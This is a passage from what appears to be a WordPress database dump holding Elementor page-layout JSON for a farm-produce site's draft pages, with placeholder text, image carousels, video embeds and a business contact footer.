url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9007,1545,'_elementor_page_assets','a:0:{}'),(9009,1546,'_elementor_edit_mode','builder'),(9010,1546,'_elementor_template_type','wp-page'),(9011,1546,'_elementor_version','3.7.8'),(9012,1546,'_wp_page_template','elementor_canvas'),(9013,1546,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9014,1546,'_elementor_page_assets','a:0:{}'),(9016,1547,'_elementor_edit_mode','builder'),(9017,1547,'_elementor_template_type','wp-page'),(9018,1547,'_elementor_version','3.7.8'),(9019,1547,'_wp_page_template','elementor_canvas'),(9020,1547,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\